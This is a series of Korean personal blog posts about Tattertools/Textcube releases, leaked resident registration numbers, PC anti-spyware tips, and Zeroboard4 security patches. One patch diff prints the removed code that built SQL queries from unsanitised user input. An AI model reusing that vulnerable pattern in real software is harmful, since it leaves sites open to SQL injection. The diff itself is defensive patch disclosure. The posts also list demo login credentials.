자세한 사용법은 매뉴얼 페이지를 참조하시기 바랍니다.


참고사항

기존의 피드 통계 플러그인이 생성하는 테이블의 구조가 잘못되어 있습니다. 1.1.3을 사용하실 때 꼭 '플러그인' 메뉴의 '테이블 설정'에서 '피드 통계' 관련 플러그인 테이블을 삭제하신 후 피드 통계를 사용해 주시기 바랍니다

내려받기
아래의 링크에서 내려받으시기 바랍니다.

태터툴즈 1.1.3 소스 : zip  tar.gz
태터툴즈 1.1.3 기본 패키지 : zip  tar.gz
태터툴즈 1.1.3 확장 패키지 : zip  tar.gz
신고

주민등록번호 외부유출문제는 어제 오늘일이 아니다. 나 또한 컴퓨터를 사용하면서 항상 주의하고

왠만하면 이곳저곳 가입하지 않는편이다. 10여년을 넘게 인터넷을 이용하고 있지만 이제까진 항상

주의해서인지 피해는 없었다. 아무래도.. 내가 서버를 운영하고 있다보니 보안쪽으로 관심이 쏠릴수

밖에 없는데 최근에 http://gendoh.tistory.com/ 이곳에서 글을 읽던중 중국사이트에서 우리나라

사람들의 주민등록번호가 공공연히 돌아다니는것을 보게 됐다. 궁금해서 나도 내이름을 검색해서

들어가봤다. 결과는 아래사진에 있다.

사용자 삽입 이미지

china.com.. 우리나라의 korea.com 같은 곳인지 모르겠지만 이름만 검색했는데도 위와같이 주민등

록번호가 몽땅 쏟아져 나온다. 클릭해보니..

사용자 삽입 이미지

아예 리스트로 만들어져서 나돌고 있다. 연령층도 다양하다..70년생부터 80년생이 주로 리스트에

작성되어 있다.

사용자 삽입 이미지

난 중국어는 전혀 모른다.. 하지만 저표현은 '띵하오'가 아닐까?;;; 고맙다한다.. 주민등록번호가

중국에서 많이 돌아다니는 이유는 상당히 많다. 여권위조 같은건 어짜피 그쪽방면의 나름 전문가

들이 하는거니까 일반인들이 주민등록번호로 뭔가 할수는 없을테고 일반적으로 사용되는 용도는
 
국산온라인 게임사이트 가입이다. 중국에서의 한류열풍이 아무래도 더 이런 주민등록번호 도용을

부추기는것 같다. 아래 캡쳐에선 이름과 주민등록번호를 사용해서 게임사이트에 가입하는 과정이

상세히 설명되있다.

사용자 삽입 이미지

어떻게 가입을 할수있는지 상세히 설명되있다..

사용자 삽입 이미지

이렇게 도용될경우에 유저에게 항의가 들어온다면 게임업체만 죽어나는것이다. 법적으로 이런경우

에 어떻게 되는지는 모르겠지만 결과적으론 해당게임업체의 신뢰도에 큰 오점을 남기고 존폐의 위기

가 찾아올수도 있는 문제이다. 요새는 왠만한 게임업체에선 SMS(문자메시지) 인증을 사용하니까

가입자체에는 크게 신경쓰지 않아도 될지 모르지만 주민등록번호가 사방팔방 돌아다닌다면 어떤

용도로 쓰이게 될지도 모르고 큰일이 아닐수 없다. 예전에 구글에서 이런일이 발생한적이 있었다.

검색했을때 주민등록번호가 튀어나와버리는..지금은 해결되있지만 이때 흘러나간 주민등록번호도

상당할것이다. 또하나의 문제는 국내에서의 재사용이다. 그래도 국내에서 주민번호도용이 생겼을땐

그나마 잡을수라도 있으니까 다행이다. 해외에서 도용해 버리면 정말 말안해도 대략난감일것이다.

이번에 서버업그레이드를 하면서 이래저래 느낀점이 많았었다. 리눅스가 보안에 뛰어난건 사실이다.

하지만 윈도우에 10년이 넘게 익숙해져있는 사용자들에겐 리눅스가 아무리 쉽다고 하고 X윈도우가

있어서 GUI환경을 제공한다고 해도 여전히 커맨드 입력위주인 리눅스를 접하기 힘든게 사실이고

지원하는 프로그램들도 윈도우용 응용프로그램들에 비하면 턱없이 모자르다. 어쨋건..윈도우를

제일많이 쓰니까 이렇게 주민등록번호들이 빠져나가지 않게 주의하려면 사용자들도 최소한의

지식은 있어야 된다는 것이다. 왠만한 보안에 대한 글이 있는 곳에서면 볼수 있는글이지만..

1. 무분별한 Active X 설치금지
 
사용자 삽입 이미지

우리나라에선 보안에 취약할수있는 Active X를 너무나 사랑한다. 윈도우 비스타가 나올때 정부에서

MS에 Active X를 사용할수 있게 해달라고 할정도면 더이상 할말없을 정도로 많이 쓰이고 있는데

Active X를 자동설치하게 내버려두진 말자는 것이다. 위와같이 인터넷옵션에서 'Active X 컨트롤을

사용자에게 확인' 란을 사용안함으로 체크해두면 Active X 컨트롤이 필요한 사이트 접속시 브라우저

윗칸에 노란색으로 뜨게된다. 보고 안전한 사이트만 필요한 Active X 컨트롤을 설치하도록 한다.

요새는 이 옵션을 무시하고 강제로 설치되는 악의적인 Active X 프로그램들도 있다.

2. 스파이웨어 탐지 프로그램, 백신을 기본적으로 사용할것

사용자 삽입 이미지

현재 쓰고있고 정말 뛰어난 백신이라고 생각한다. 패턴 업데이트 주기도 매우 빠르다. 단점이라면

상당히 무겁다는것이다. 풀옵션으로 실시간 감시를 돌리면 고사양의 컴퓨터가 아니면 감당하기

힘들다. 그래도 스파이웨어방지는 이것만으론 부족하다. 국산 스파이웨어만 있는것이 아니라 외산

스파이웨어들을 국산 스파이웨어방지 프로그램이 감지하지 못하는경우가 있기때문에 내경우엔

두가지를 위한 프로그램을 모두 사용하고 있다. 하나는 Lavasoft에서 나온 Ad-Aware이다.

사용자 삽입 이미지

이것도 상당히 무거운 프로그램이다. 업데이트는 매우 잦은편은 아니다 거의 10일정도를 주기로

정의파일이 업데이트 된다. 외산 스파이웨어를 막는데는 상당히 좋은 프로그램이다.

사용자 삽입 이미지

PC free 3.0 pro 버전이다. 국내 스파이웨어 방어용으로 참 좋은 프로그램이다. 그러나 레지스트리

정리 기능은 가급적 쓰지 않길 바란다. XP에서 자주사용했지만 이기능만큼은 http://rodream.net

의 클릭투트윅이 더나은듯 싶다.

사용자 삽입 이미지

마지막으로 사용중인 스파이웨어 감지툴이 위의 http://rodream.net 의 울타리 이다. 제작자가

고등학생때부터 시스템 관리툴인 클릭투트윅을 만들기 시작해서 지금은 대학생으로 알고있는데

참 잘만들었다. 다른프로그램에서 안잡히던 스파이웨어를 잘잡는다.

이렇듯 왠만한 대비만 있다면 쉽게 해킹당하거나 하진 않는다. 그리고 컴퓨터가 지나치게 느려졌다

생각되면 작업관리자를 유심히 살피는것이 좋다. 한 프로세스가 CPU점유를 과도하게 많이 잡아

먹으면 의심해보는것이 좋다.

나도 비전문가이지만 이런툴도 제대로 사용하지 않는경우가 허다하다. 전엔 여자친구 컴퓨터를

원격접속으로 손봐준적이 있었는데 보안에 완벽히 무방비 상태였다. 그래서 여러가지 셋팅을

해준적이 있는데 스파이웨어나 백도어 프로그램(쉽게 말하면 뒷구멍 프로그램.. 사용자의

PC에 몰래 프로그램을 설치해두고 저장된 정보를 가져가는 경우등이 있다. 키로거 프로그램이

포함되있는경우가 많아 사용자가 ID나 password등의 정보를 입력했을때 가로채서 저장하는

경우도 있다.) 으로 정보가 유출되는 경우가 의외로 많다. 주민등록번호 도용은 심각한 문제이다.

모두가 개인정보를 입력할때는 조심해야될것이다. 그리고 정말 중요한 개인정보는 하드디스크에

저장하지 않는것이 좋다. 따로 USB메모리 등에 저장하던지 해서 보관해 두는것이 좋다.

마지막으로 한가지 더! 왠만한 알지못하는 중국사이트는 들어가지 않는것이 좋다. 중국에서

만들어진 프로그램 중에는 정말 악질 프로그램도 많고 중국산 스파이웨어 감지기가 아니면 아예

잡을수도 없는경우도 생긴다.

신고
텍스트큐브 1.5 alpha 5버전이 발표되었습니다. 아래는 텍스트큐브 alpha5 발표에 관한 원문입니다.

맨아래 링크에서 테터툴즈 1.1.3 테스트 버전과 Textcube 1.5 alpha 5 버전을 체험해볼수 있도록

ID,PW를 공개합니다. 비밀번호를 바꾸지 말아주세요.(6. 6~6.11일까지)

ID : test@example.com
PW : 1023784

--------------------------------------------------------------------------
Textcube (이하 텍스트큐브) 의 다섯번째 알파버전 (1.5.3380.20070530) 을 공개합니다. 이후 알파버전은 베타 페이즈에 들어가기 전까지 1주일을 주기로 발표될 예정입니다.

소개

2007년 4월 14일 발표된 내용 ( http://notice.tattersite.com/ko/11 에서 정리된 내용을 읽을 수 있습니다) 에 따라, 기존의 태터툴즈는 프로그램 이름이 아니라 ttxml형식으로 백업이 가능하며 데이터 권리를 사용자가 가짐을 보장하는 프로그램 및 서비스를 아우르는 명칭이 됩니다.

기존의 설치형 블로그인 태터툴즈의 경우, needlworks에서 설치형 프로그램 코어(프로젝트 S2)의 설계및 제작을 전담합니다. 프로젝트 S2의 정식 명칭이 Textcube로 결정되었습니다.

한 줄 요약 : TNC/TNF 태터툴즈 -> Needlworks/TNF 텍스트큐브

주의사항

    * 본 버전은 반드시 테스트 용으로만 사용하셔야 합니다.
    * 태터툴즈 플러그인 지원을 위한 레거시 루틴이 추가되어 있지만 플러그인 호환성 부분에서 문제가 발생할 가능성이 있습니다.
    * 기본 에디터는 HTML raw 에디터입니다. 기존에 사용하던 위지윅 에디터를 사용하거나, 위지윅 에디터로 작성된 글을 보기 위해서는 '플러그인'의 모듈 카테고리에서 위지윅 에디터 모듈과 TTML 파서 모듈을 사용함으로 변경하여야 합니다.

내려받기
다음 링크를 눌러 내려 받으실 수 있습니다.

피드백
피드백은 TNF forum의 버그 보고 및 품질관리 게시판을 통해 주시기 바랍니다.

Changelog

more..


스킨 관련 변경점 및 추가 안내

* 404 에러 관련
페이지가 없을 때 출력되는 페이지를 스킨에서 추가적으로 지정할 수 있습니다. <s_page_error>로 묶은 부분이 에러 발생시에 출력됩니다. 스킨에 해당 부분이 없을 경우에는 1.5 이전과 똑같이 동작합니다.

* 트랙백 검색 관련 스킨 추가
  트랙백 검색 결과 출력을 위한 , , <s_tblist>, <s_tblist_rep>, , , , ##_tblist_rep_body_##]가 추가되었습니다. 아래는 예제입니다.

------------------------------
<s_tblist>
    <div class="searchTblist">
        <h3>''에 해당되는 트랙백 건</h3>
        <ol>
        <s_tblist_rep>
        <li>
            <span class="date"></span>
            <span class="name"><a href=""></a></span>
            <div class="contents"></div>
        </li>
        </s_tblist_rep>
        </ol>
    </div>
</s_tblist>
------------------------------

플러그인 관련 변경점 및 추가 안내

* 플러그인 이름 변수
기존의 변수들($pluginURL, $pluginPath)에 플러그인의 이름을 가져올 수 있는 변수인 $pluginName이 추가되었습니다.

* 플러그인 설정 component 제공
index.xml을 통한 텍스트큐브의 설정 메뉴 대신 설정 프로그램 자체를 만들 수 있습니다. 이 경우 Textcube.Model.PluginCustomConfig 컴포넌트를 사용하면 됩니다.
index.xml의 manifest에서 config 바인더를 사용하지 않는 경우 컴포넌트를 사용할 수 있습니다.

인터페이스는 다음과 같습니다.
PluginCustomConfig{
         /* public bool*/
         function load(){
        /* public string null*/
        function getValue($name){
        /* public bool*/
        function setValue($name , $value){
        /* public array null */
        function getAllValue(){
        /* public bool */
        function setMergedValue( /* array */ $configVal ){
        /* public bool */
        function setAllValue(/* array */ $configVal ){

BlogAPI 관련 변경점 및 추가 안내
* BlogAPI 전용 비밀번호 설정 기능
BlogAPI를 사용하여 글을 작성하실 경우 로컬 프로그램을 사용하는 경우는 관계없지만 다른 서비스를 글 에디터로 사용하는 경우가 있습니다. 이 경우 본인의 블로그 암호를 해당 서비스에 노출하고 싶지 않은 경우를 위하여 BlogAPI에만 적용되는 비밀번호를 따로 지정할 수 있습니다. '환경설정'-'글 작성' 의 글 작성 환경 설정에서 비밀번호를 지정하시면 됩니다.

* 카테고리를 지원하지 않는 클라이언트에도 카테고리를 지원
기존의 BlogAPI는
   http://blog.example.com/api
형태의 XMLRPC server url이 존재합니다. 클라이언트 중에서 카테고리를 지정하지 않고 글만 작성하는 경우가 있습니다. 예를 들어 me2day에서 전송해 오면 카테고리가 지정되지 않아 '분류없음' 으로 등록이 되고, 알라딘의 ttb의 경우 category가 Aladdin으로 전송되어 옵니다. 이렇게 클라이언트가 약간 기능이 부족하여 카테고리 지정으로 인한 다양한 기능을 사용하지 못하는 것을 만회하기 위해 다음과 같은 BlogAPI 주소를 사용할 수 있습니다.
1) http://blog.example.com/api?category=mycategory
2) http://blog.example.com/api?category=%E … D%EA%B0%81
3) http://blog.example.com/api?category=2

위와 같이 category 라는 변수 뒤에 UTF-8으로 카테고리명을 지정하면, 클라이언트가 지정하거나 혹은 지정하지 않는 경우에라도 강제로 설정하는 기능입니다. 즉, 해당 카테고리에 posting하는 BlogAPI xmlrpc service url이 되는 것입니다.


3)의 예는 현재는 카테고리 이름만으로 구별하는데, 만약 UTF-8 문자열을 구하기 어렵거나 한글에 애로사항이 생길 경우 내부 식별자인 숫자로도 지정할 수 있습니다. 내부 식별자를 알 수 있는 방법은 "관리자>글>분류관리" 메뉴에서 미리보기의 카테고리를 눌렀을 때 주소창에 다음과 같이 나옵니다.
http://blog.example.com/owner/entry/cat … =%ED%94%84


환경 설정 파일 관련 변경점 및 추가 안내
config.php에서 가능한 설정 값들은 doc/config 에서 확인할 수 있습니다.

* RSS 주소 기본값의 숫자 변경
RSS로 출력되는 주소값은 관리자 모드에서 결정한 값 (문자/숫자)을 따라갑니다. 설정에 관계없이 무조건 숫자로 출력하기 위해서는루트 디렉토리의 config.php에
     $service['useNumericURLonRSS'] = true;
를 추가하면 됩니다.

------------------------------------------------------------

텍스트큐브 alpha 5 테스트 페이지

http://xens.dnip.net:9996/test/tc

테터툴즈 1.1.3:transition 테스트 페이지

http://xens.dnip.net:9996/test/tt
신고
'테터툴즈'가 '텍스트큐브'로 명칭이 바뀌면서 테터툴즈의 마지막 버전인 1.1.3 : Transition 테스트

 버전이 공개 되었습니다. 테스트 버전이라 아직 설치해보진 않았는데 아래는 테터툴즈 공지사항에

 있는 원문이며 몇가지 버그들이 수정되었습니다. 텍스트큐브는 현재까지 alpha 4 까지 공개된 상태

 이며 클로즈베타가 얼마 남지 않은듯 싶습니다. 개인적으로 텍스트 큐브가 공개될때 바라는점은

 가장중요한 테터툴즈 ↔ 텍스트큐브 간의 데이터 호환성입니다. 텍스트 큐브의 디렉토리 구조가

 테터툴즈와 다르기 때문에 그냥 덮어씌웠을 경우 문제가 생길수도 있고하니 XML파일 백업/복원

 기능이 완벽히 이뤄졌으면 하는 바램입니다.
------------------------------------------------------------------------

'태터툴즈'의 마지막 버전인 태터툴즈 1.1.3 : transition (가칭) 테스트 버전을 공개합니다.

태터툴즈 1.1.3은 텍스트큐브 1.5를 개발하면서 텍스트큐브에서 해결된 다수의 버그 수정들 및 약간의 개선점을 담고 있습니다.



다음의 버그들이 수정 되었습니다.
  * 아카이브 출력시 스킨의 index.xml 설정을 따라가지 않는 문제 수정. (#372)
  * 데이터 복원시 사이드바 플러그인의 존재 유무에 관계 없이 자동으로 로딩되는 문제 수정. (#242)
  * IE에서 첨부파일 다운로드후 캐시 폴더에서 바로 실행할 경우 cache-control 때문에 실행되지 않는 문제 수정. (#381)
  * 사이드바 설정 화면에서 사이드바 플러그인 처리시 사용하지 않는 핸들러로 인한 warning 발생 수정 (#382)
  * 피드 통계 플러그인 사용시 초기 데이터베이스를 잘못 만드는 오류 수정 (#385)
  * RSS 출력시 이미지 경로가 상대 경로로 출력되어 피드 구독기에 따라 이미지가 제대로 보이지 않을 수 있는 문제 수정 (#391)
  * Call-time pass-by-reference warning (#404)

또한 다음의 동작들이 변경 되었습니다.
  * 댓글 알리미 검색 결과를 최근 시간순으로 출력되도록 수정. (#409)
  * 속도 향상을 위하여 스팸 필터 비우기를 매 출력시 실행하지 않고 하루에 한 번만 휴지통을 비우도록 최적화. (#384)

참고사항
1.1.3을 사용하실 때 꼭 '플러그인' 메뉴의 '테이블 설정'에서 피드 통계 관련 플러그인을 삭제하신 후 피드 통계를 사용해 주시기 바랍니다.



태터툴즈 1.1.3은 optimizer를 사용하지 않은 채로만 발표될 예정입니다. 이후 텍스트큐브들도 모두 소스 버전으로만 발표될 예정입니다.

1.1.3 테스트 버전은 이 곳에서 내려 받으실 수 있습니다.
신고
제로보드4의 패치가 또 나왔습니다. 수정된 부분이 아래 있으니 해당부분에 붙혀넣기 하여 수정

하시거나
http://nzeo.com 에서 패치파일을 받아 적용하시기바랍니다. 아래는 원문입니다.

---------------------------------------------


관리자 메일 발송 코드에서 $s_que 변수를 이용한 SQL Injection을 일으킬 수 있는 코드가 발견되어 패치합니다.

첨부된 admin_sendmail_ok.zip 파일의 압축을 풀면 나오는 admin_sendmail_ok.php파일을 사용하시는 제로보드4의 디렉토리에 덮어쓰시면 됩니다.

수정된 부분은 다음과 같습니다.

= admin_sendmail_ok.php ===============================================================

@@ -28,16 +28,18 @@
        if(!$true) $true = 0;
        if(!$nomailing) $nomailing = 0;
        if(!$sendnum) $sendnum = 100;
+    $group_no = (int)$group_no;
+    $s_que = '';
        if(!$total_member_num) {
                $temp=mysql_fetch_array(mysql_query("select count(*) from $member_table where group_no='$group_no'",$connect));
                $total_member_num=$temp[0];
        }

        if($cart) {
-               $temp=explode("||",$cart);
-               $s_que=" and ( no='$temp[1]' ";
-               for($i=2;$i<count($temp);$i++) $s_que.=" or no='$temp[$i]' ";
-               $s_que.=" )";
+               $temp = explode("||",$cart);
+        for($i=0;$i<count($temp);$i++) $target_srls[] = (int)$temp[$i];
+        $s_que = sprintf(' and ( no in (%s) )', "'".implode("','", $target_srls)."'");
        } else {


===============================================================================

위에서 - 가 붙은 줄은 삭제된 것을 의미하며 +가 붙은 줄은 추가된 것을 의미합니다.

이 보안버그를 알려주신 달팽이 (ID : mirr1004)님께 감사의 말씀 드립니다.


혹시 이 패치 적용후 메일 발송에 문제가 생기거나 보안 버그가 지속적으로 발견되면 꼭 알려주시면 감사하겠습니다.
신고
테터툴즈가 업그레이드 되거나 했을때 여러가지 방법으로 기존데이터를 백업/복구 시킬수 있지만

개인적으론 테터툴즈 관리자 메뉴에 있는 가장 간편한 첨부파일 포함 XML파일로 저장하는것을

좋아한다. 근데 개인웹서버 사용자의 경우 큰 용량의 XML파일을 로컬에서 부르면 제대로 백업이

안되는 경우가 생긴다. 테터툴즈 홈페이지의 묻고 답하기 게시판을 보면 Berryz webshare라는

프로그램 으로 복원을 정상적으로 할수 있다고 하는데 직접 해보았다.

http://berryz.upnl.org/main.php/
 -> 베리즈 웹쉐어 홈페이지

베리즈 웹쉐어는 웹폴더 서버 생성프로그램인데 사용법도 너무나 쉽다. 실행시키고 공유폴더나

파일만 추가 시키고 브라우저에서 자기컴퓨터의 주소나 IP만 입력해주면 된다. 물론 공유기를

사용중이거나 기타 이유로 웹서버 기본포트인 80번을 이용하지 못한다면 공유기는 각자가 쓰는

기기에 맞게 DMZ설정을 해줘야 할것이고 통신사에서 막았다면 9999나 9998 ..8080등의 포트번호

를 써주면 된다.

그리고 테터툴즈의 관리자->환경설정->데이터 관리를 눌러 아래와 같이 써준다.

사용자 삽입 이미지

물론 XML파일을 베리즈 웹쉐어에 공유추가 시켜주면 된다. 그리고 복원하기를 눌러주면 제대로

복원이 된다. 내경우엔 Vmware내에서 각종 실험용으로 쓰이는 웹서버에 시험해봤는데 그냥 로컬

파일로 불러왔을때는 40Mb정도의 XML파일 복원에 실패했고 베리즈 웹쉐어를 호스트 컴퓨터에서

돌리고 VMware 에서 복구시켰을때 성공했다. 티스토리또한 마찬가지 였다. 다만 지금 알파버전인

텍스트큐브의 경우는 데이터 구조가 틀린탓인지 이전버전과 XML호환이 된다고 알고있었는데

복구가 되지 않았다. 어쨋든 테터툴즈 사이에는 그런문제는 없었고 구/신버전간의 복원 문제도

없었다. 대용량XML파일로 복원이 안되고 있다면 한번 사용해보는게 좋겠다.
신고
1. 제로보드4 pl8 패치 및 제로보드 XE 새소식

제로보드4 pl8 의 보안패치가 새로 배포되었습니다. 원문에 따르면 download.php 의 sql injection

문제에 대한 수정과 lib.php에 대한 수정이 있다고 합니다. 댓글의 DearMai 님의 글에

lib.php 파일에 39번~41번줄까지 아래의 내용이 추가되었다고 하니 기존의 쓰던파일을 수정해서

쓰고계신분들은 따로 수정하시면 되겠습니다.

40a39,41
> unset($s_que);
> $select_arrange = str_replace(array("'",'"','\\'),'',$select_arrange);
> if(!in_array($desc,array('desc','asc'))) unset($desc);

나머지 부분은 추가로 어느부분이 수정된지는 자세히 모르겠고 전체적인 패치된 파일의 목록은

아래와 같습니다.

image_box.php
member_join_ok.php
member_modify_ok.php
login_check.php
lib.php
member_memo.php
member_memo2.php
member_modify_ok.php
license.txt

http://www.nzeo.com 에서 패치파일을 다운로드 하실수 있고 자세한 패치내용도 확인하실수

있습니다.

제로보드 5가 개발자분의 개인적사정으로 잠정적인 업데이트 중단이 된데에 이어서 NHN의 협조로

오픈프로젝트인 제로보드 XE가 개발중에 있습니다. 원문에서는 6월말이 넘어서나 클로즈베타

테스트를 행할것 같다고 합니다. 개인적으로 제로보드 4를 상당히 유용하게 써봐서 오픈프로젝트

인 이 제로보드 XE에 상당한 관심이 갑니다. 다만 이왕나오는것 UTF-8 버전과 EUC-KR 버전이

함께 나왔으면 하는 바램입니다.

2. 텍스트큐브의 소식
 기존의 테터툴즈의 1.1.2.x 버전에서 1.5의 버전을 가지고 나올 텍스트큐브가 개발중에 있습니다.
사용자 삽입 이미지

공지 원문에 따르면 아래와 같이 설명하는데 테터툴즈라는 블로그 쓰는데에만 관심있다보니

아래같은 내용이 뭘 뜻하는지는 자세히 모르겠습니다.

기존의 설치형 블로그인 태터툴즈의 경우, needlworks에서 설치형 프로그램 코어(프로젝트 S2)의 설계및 제작을 전담합니다. 프로젝트 S2의 정식 명칭이 Textcube로 결정되었습니다.

한 줄 요약 : TNC/TNF 태터툴즈 -> Needlworks/TNF 텍스트큐브

다만 버전이 갑자기 높아짐에 따라 사용자 들의 혼란이 약간 있을듯 합니다. 디렉토리들의 구조가

많이 바뀌어서 기존에 사용하던 테터툴즈의 (blog, style, doc, component, script, lib) 디렉토리를

삭제후 textcube를 설치할것을 권장하고 있는데 현재 텍스트큐브 알파버전의 디렉토리 구조는

다음과 같습니다.

사용자 삽입 이미지

원문내용대로 기존의 테터툴즈 블로그의 위에 써놓은 폴더들을 삭제하고 텍스트큐브를 덮어씌워

봤는데 이상없이 작동합니다. 지금 vmware에서 사용하는 APM이 테스트용이라 기존 테터툴즈

블로그의 글이 한개도 없어서 이상이 없는지는 모르겠습니다만 불안하다면 기존의 테터툴즈의

데이터를 XML로 첨부파일과 함께 모두 백업하여 텍스트큐브에 저장하여도 호환성이 유지된다고

하니 텍스트큐브가 정식 런칭 된 후에는 이방법을 쓰는것이 제일 깔끔할듯 싶습니다.

대신 플러그인의 경우는 공식플러그인이 아닌경우엔 기존에 쓰던 플러그인에서 몇가지 에러가

발생할수도 있겠다는 생각이 듭니다. 그리고 백업한 파일의 크기가 클경우 복원이 안될경우가

있으니 필히 원래의 데이터를 XML저장이 아닌 전체백업을 해두는것이 좋습니다.

주의! : 글작성후 텍스트큐브에 제가쓰는 테터툴즈 1.1.2.2 의 데이터를 import 시켜봤

습니다. 결과는 복구가 안됐습니다. 테터툴즈 끼리는 구,신버전간 복구가 잘됐고 티스토리

에서도 복구가 잘됐습니다. 지원하지 않는 데이터라고 표시된후 복구가 되지 않는군요..
신고
1. 펌웨어가 최신버전이라고 해서 항상 향상된 기능을 보장하는 않는다. 자신의 하드웨어와
 
 궁합이 잘 맞는 펌웨어 롬이 가장 좋다.

2. 윈도우 XP이상의 운영체제에서 윈도우용 펌웨어 업데이터로 업데이트 할때는 조심해야한다.

 XP의 경우 대부분 이상없이 잘되나 윈도우 비스타의 경우 해당 업데이터가 비스타를 지원하는지

 확인하고 UAC(User Account Control)를 해제한뒤 관리자 모드에서 업데이트 하는것이 바람직

 하다. 업데이트중 UAC가 시스템 보호를 위해 물리적 접근을 차단하거나 하면 펌웨어 업데이트중

 멈춰버릴 것이고 해당기기가 오작동 하거나 고장날수 있기때문이다.(UAC해제방법에 대해서는

 다른 팁을 참고하고 Vista에서 관리자 모드 사용활성화 방법은 링크를 참조하면 되겠다.)

 3. 백신 프로그램 이나 악성코드검사기를 잠시 중지 시키고 통신모뎀을 꺼둔다. 요새 백신 프로그램

 같은 경우에도 따로 설정하지 않으면 업데이트 도중에 막아버리는 경우가 생길수 있다. 백신이나

 악성코드 검사기를 켜둘경우 잠깐사이에도 악성코드가 침투할 수 있으므로 모뎀또한 꺼둔다.

 4. 업그레이드 대상기기의 모델명을 제대로 인지한다. 예를들어 메인보드 ASUS P5LD2의 경우

 deluxe 버전과 미니케이스용인 VM모델이 있다. 착각하여 다른 메인보드 BIOS로 업데이트 할

 경우 예기치 못한 에러가 생길것이다. 그리고 가급적이면 해당모델 제조사의 공식홈페이지에서

 확인하여 롬을 받는것이 좋다.

 5. 전력확인, 번개나 벼락이 치는날엔 업데이트를 하지 않는것이 좋다. 갑자기 정전이 되거나 하면
 
 기기가 망가질 수 있다.

------------------------------------------------------

 펌웨어 업그레이드가 상당히 위험한듯 글을 썼는데 그다지 위험하진 않다. 다만 최근에 내가

 경험한 것은 메모리스틱 펌웨어 업그레이드를 비스타에서 하다가 펌웨어 프로그램이 멈춰버려

 메모리스틱을 교환받는 경우가 있었기 때문이다. 내 실수였는데 교환받은후 Vmware를 사용해

 윈도우 XP에서 펌웨어 업그레이드 했을때는 아무런 이상이 없었다. 위에서 언급했던 내용대로

 했었는데 비스타에서는 펌웨어 업그레이드를 신중히 해야할것 같다.
신고
나처럼 테터툴즈를 자신의 컴퓨터를 윈도우나 리눅스의 웹서버로 쓰는 분들이나 호스팅 업체에서

계정을 받아 사용하는 경우가 있을것이다. 고정 IP를 쓰고 있다고 해도 주소가 필요해서 나처럼

http://dnip.com 이나..codns 같은 도메인포워딩업체를 이용하는 경우가 많은데 이들의 주소형식이

맘에 들지 않아서 다른 업체를 사용하는경우 데이터 이전후에 테터툴즈 관리자 모드가 로그인이

안될때가 있는데 이경우 간단한 해결 방법이 있다.

테터툴즈를 설치한 디렉토리를 보면 config.php 파일이 있다. 테터툴즈를 재설정 해서 사용하고

싶다면 이 파일을 지워버리고 install.php를 실행시켜 설치하는 방법이 있으나 주소이전으로

관리자 모드 접속이 안되는 상태라면 config.php 파일을 편집기로 열어 수정하면 된다.

보안상 내 서버정보부분은 모두 삭제하였다..

config.php 본문
----------------------
<?php
ini_set('display_errors', 'off');
$database['server'] =
$database['database'] =
$database['username'] =
$database['password'] =
$database['prefix'] =
$service['type'] =
$service['domain'] = 'xens.dnip.net'; <-- 바로 이곳을 새로이전한 주소로 수정해주면된다.
$service['path'] = '';
$service['skin'] =
//$serviceURL = 'http://xens.dnip.net' ; // for path of Skin, plugin and etc. <-- 이곳도 수정해줌
?>
-----------------------

매우간단하게 관리자 모드로 다시 접속이 가능한것을 볼수있다.
신고

뭐...중국이나 일본뿐은 아니지만.. 현재 우리나라에 가장 위험한 악성코드 피해는 중국쪽이라


생각된다. 우리나라처럼 이렇게 손쉽게 악성코드가 유입될수있는 Active-x를 애용하는 나라도


없다 하니.. 중국의 이런 금전을 목적으로 해킹을 시도하는 작자들이 그냥 넘어갈리가 없다..


앞서까지 중국에서 이뤄졌던 악성코드 주입을 통한 해킹의 경우 DoS(Denial of Service)공격을


많이 시도했었다.. 제로보드4의 경우도 SQL Injection 취약점을 통해 이러한 공격을 받아온적이


있으며 패치가 이뤄지곤했다. 그러나.. 요새는 더심하다고 한다. 바로 DDoS(Distributed Denial


Of Service)공격의 경우인데 쉽게 한 사용자 PC에 악성코드를 심고나서 이PC가 네트워크를


돌아다니다 보면 수많은 컴퓨터들이 감염될것이다. 그러면 그렇게 모인 여러대의 PC가 특정한


희생양이 될 사이트를 괴롭히게 되는데 사이트의 서버만 공격하는것이 아니라 중간 네트워크


장비들까지도 괴롭혀 엄청난 트래픽을 발생시키게 되고 결국 서버에선 서비스를 거부하게되는


것인데.. 사실 나같은 영리적 목적이 없는 개인서버 운영자는 별 상관이 없다. 잘못해서 악성코드


라도 걸려도 금전적 손해는 없으니까.. 그러나 기업의 경우는 다르다. 특히나 IT관련 기업들이


그런데.. 예를 들어 한 호스팅업체 사이트가 이러한 공격으로 서비스가 중단된다고 하면


어떤 유저는 이 호스팅 업체를 믿고 인터넷 쇼핑몰을 운영하는데 그날 접속이 안되어 막대한


손실을 볼수도 있고 이런것 외에도 금전적으로 무엇인가 연관되있다면 그 업체는 막대한 금액을


피해보상 해줘야 할지도 모르는것이다. 그래서 어떤 해커는 '너네만 공격빼줄테니까 돈좀주라'


하는 경우도 있다하는데 사실 기업홈페이지나 사업자 홈페이지 입장에서는 돈을 주기도 안주기도


곤욕스러운 부분이겠다. 돈을 안주자니 당장 공격당해 서비스 불능으로 사용자의 신뢰를 잃는것이

불안하고 주자니 쌩돈 날리는 것이고..이렇듯 악성코드에 대한 피해는 엄청나다.. 개인사용자는

PC에 프로그램을 설치할때 잘 살피자. 무조건 yes만 누르지 말고 툴바등은 가급적 설치하지 말고

백신이나 악성코드 검사기는 신뢰하는 몇몇프로그램을 제외하고는 설치하지 말도록 한다.

그리고 무분별한 Active X설치를 하지 않는게 좋겠다. 서버관리자들도 이러한 일들 때문에 참

스트레스 많이 받겠다 싶은 생각이든다....


신고
사실 언제부터 Active x가 이렇게 전국의 인터넷 망을 뒤덮었는지도 잘 모르겠다.

액티브X하면 생각나는건 예전에 윈도우 98 설치후에 바탕화면...;; 아무튼.. 이놈의 악성코드들

정말 문제가 심각하다. 필자의 경우도 세가지의 악성코드 방지 프로그램을 쓰고 Ahnlab의

V3을 10여년이 넘게 애용해오다가 악성코드를 많이 못잡는듯 하여 이제는 Kaspersky Internet

Security를 쓰고 있다. 뭐 프로그램들이 다잡지 못해서 모르는지는 몰라도 일단 지금 상태에선

내PC내에 악성코드가 존재 하는것 같진 않다.. 특별히 뭔가가 실행되서 컴퓨터가 느려지거나

하는것이 없다는 단순생각에.. 아무튼.. 보면 한국이나 미국등지에서 퍼지는 악성코드는 많이들

막아지는것 같다. 우리나라에서도 많은 악성코드 퇴치 프로그램들이 실시간 감시도 하고 검사도

가끔 해주면 금방 없앨수 있으니.. 외국프로그램같은 경우도 마찬가지다. 필자의 경우엔

